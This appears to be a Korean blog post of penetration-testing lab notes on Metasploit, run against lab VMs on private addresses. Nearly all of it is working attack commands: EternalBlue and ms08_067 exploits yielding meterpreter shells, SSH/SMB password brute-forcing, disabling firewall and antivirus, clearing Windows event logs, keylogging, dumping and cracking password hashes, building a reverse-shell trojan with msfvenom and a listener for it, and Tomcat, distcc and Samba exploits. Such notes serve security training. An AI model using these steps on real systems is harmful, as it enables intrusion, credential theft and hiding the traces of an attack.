메타스플로잇

시스템 보안 2019. 3. 7. 21:45

[메타스플로잇]


1. 특징

- 취약점 분석

- 자동화

- 보안 식별


2. 활용

- 취약점 분석

- 진단

- 침투 테스트


3. 용어

1) 익스플로잇 : 시스템 , 서비스 공격 방법(행위)

2) 페이로드 : 공격 코드

3) 모듈 : 루비(Ruby) 언어의 모듈

4) 세션 : 공격자와 공격 대상자와의 연결


4. 라이브러리/모듈


5. 모듈

1) Exploit

2) auxiliary : 보조 모듈

3) Post : 2차 공격

4) Payload : 공격 코드


6. 인터페이스

1) GUI : armitage

2) TUI(CLI) : msfconsole

3) msfcli

4) msfweb


7. msfconsole 명령어

1) help : 도움말

2) search : 모듈 검색

3) use : 특정 모듈 연결

4) info : 정보 출력

5) set : 모든 설정

6) show : 출력

7) exploit : 모듈 실행 , 공격 명령



[ Kail ]


# msfdb init



# service postgresql restart


# msfconsole



msf5 >  use auxiliary/scanner/smb/smb_version


msf5 > options



msf5 > set rhosts 192.168.196.130(공격대상)

msf5 > unset rhosts 192.168.196.130 풀어주기


msf5 > options



msf5 > set threads 256


msf5 > options



msf5 >  run



msf5 > nmap -T4 -sV -v 192.168.196.130(공격대상)



msf5 > nmap -p 445 192.168.196.130(공격대상)



msf5 > back 초기화면




[ Win7 ] 

cmd

net user test 1234 /add




[ Kail ]


msf5 > use auxiliary/scanner/smb/smb_login


msf5 > set smbuser test



msf5 > set smbpass 1234



msf5 > set rhosts 192.168.196.130



msf5 > options



msf5 > run




[ CentOS ]


# systemctl stop firewalld

# systemctl restart sshd


[ Kail ]



msf5 >  use auxiliary/scanner/ssh/ssh_version


msf5 > set rhosts 192.168.91.140


msf5 > run


msf5 > use auxiliary/scanner/ssh/ssh_login


msf5 > set rhosts 192.168.91.140


msf5 > set username test


msf5 > set password 1234


msf5 > set stop_on_success true



--- 사전 파일 생성 ---

passw_list

user_list

-----------------------


msf5 > set user_file /user_list


msf5 > set pass_file /passw_list




database



[ 취약점 코드 ]


- 국제 공통 코드 : CVE-2018-0123  2018년도 발견 123번째 

- MS사 : ms08-0123  08년 123번째 발견


# nmap -p 445 192.168.91.137


# msfconsole


msf5 > use exploit/windows/smb/ms17_010_eternalblue


msf5 > set payload windows/x64/meterpreter/bind_tcp


msf5 > set rhosts 192.168.91.137


msf5 > set lport 443


msf5 > exploit


meterpreter > shell  <-- 직접 접속 가능


meterpreter > screenshot




win xp 공격



msf5 > use windows/smb/ms08_067_netapi


msf5 > set payload windows/vncinject/bind_tcp


msf5 > set rhosts 192.168.91.141


exploit







< 방화벽 중단 명령어 >

shell 에서

netsh firewalld s et opmode=disable

 

run killav 

 

run post/windows/gather/screen_spy  <---- 5초동안 6장을 찍는다

경로 >>> 숨김파일보기 체크  /root/.msf4/loot

 

run post/windows/gather/enum_applications

> 어떤 app이설치돼었는지

 

run post/windows/gather/enum_devices

> 어떤 장치들이 설치돼었는지

 

run post/windows/gather/enum_services

> 실행중인 프로세스

 

run post/windows/gather/usb_history

> usb 사용내역

 

 

 

 

 

[ Win7 ]

 

use exploit/windows/smb/ms17_

 

set payload windows/x64/meterpreter/bind_tcp

 

set rhosts 192.168.91.137

 

set lport 443

 

exploit

 

 

> getuid

> getpid

> getsystem

> shell

> C:\ > wevtutil_exe cl "System"

> C:\ > wevtutil_exe cl "application"

> C:\ > wevtutil_exe cl "Security"

 

> exit

meterpreter > ps  <--- notepad pid 확인

meterpreter > migrate notepad(pid num)

meterpreter > run post/windows/capture/keylog_recorder

메모장 타이핑

 

저장위치  cd /root/.msf4/loot/

 

 

meterpreter > hashdump

 

https://crackstation.net/ <---- 해쉬 변환 사이트

 

해쉬코드 복사해서 /root/pass.txt 파일로 저장

 

# john --wordlist=/usr/share/john/password.lst --format=NT /root/pass.txt

 

# john --show --format=NT /root/pass.txt



# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.91.143 lport=4444 -f exe > /root/virus.exe

- 악성 코드 생성


windows 7 으로 파일 옮기기


# vi reverse.rc

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp     <--- windows 2008 x32

set lhost 192.168.91.143

set lport 4444

set exitonsession false

exploit -j -z


# msfconsole -r reverse.rc


windows7 에서 악성코드를 실행   희생자 pc 가 공격자에 접속하는 상황


meterpreter > session -i

meterpreter > session -i 1




metasploitable2 설치


root 로 변경

mysql -p mysql

password : enter

update user set password=password('123456') where user='root';

flush privlieges;



# msfconsole 


> use auxiliary/scanner/mysql/mysql_hashdump

> set rhosts 192.168.91.146

> set username root

> set password 123456

> run




> use auxiliary/scanner/mysql/mysql_schemadump

> set rhosts 192.168.91.146

> set username root

> set password 123456

> run



[TOM CAT] ( Kail )


192.168.91.146(mt2):8180/manager/html


msf5 > auxiliary/scanner/http/tomcat_mgr_login

msf5 > set rhosts 192.168.91.146

msf5 > set rport 8180

msf5 > run



msf5 > auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set password tomcat

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.91.146

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set httpusername tomcat

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set httppassword tomcat

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set payload java/shell/bind_tcp

msf5 > auxiliary(scanner/http/tomcat_mgr_login) > exploit




msf5 > use exploit/unix/misc/distcc_exec

msf5 (exploit/unix/misc/distcc_exec) > set payload cmd/unix/bind_ruby

msf5 (exploit/unix/misc/distcc_exec) > set rhost 192.168.91.146

msf5 (exploit/unix/misc/distcc_exec) > exploit


whoami


ctrl + z


sessions -l

msf5 (exploit/unix/misc/distcc_exec) > use multi/manage/shell_to_meterpreter

> set session 1

> exploit

> sessions -l








msf5 > use exploit/multi/samba/usrmap_script

msf5 (exploit/unix/misc/distcc_exec) > set payload cmd/unix/bind_ruby

msf5 (exploit/unix/misc/distcc_exec) > set rhost 192.168.91.146

msf5 (exploit/unix/misc/distcc_exec) > exploit


whoami


ctrl + z


sessions -l

msf5 (exploit/unix/misc/distcc_exec) > use multi/manage/shell_to_meterpreter

> set session 1

> exploit

> sessions -l
















'시스템 보안' 카테고리의 다른 글

Data Base Command  (0) 2019.03.06
Xe Web Server 구축  (0) 2019.03.06
apache web server  (0) 2019.03.04
DNS  (0) 2019.02.28
FTP  (0) 2019.02.27

설정

트랙백

댓글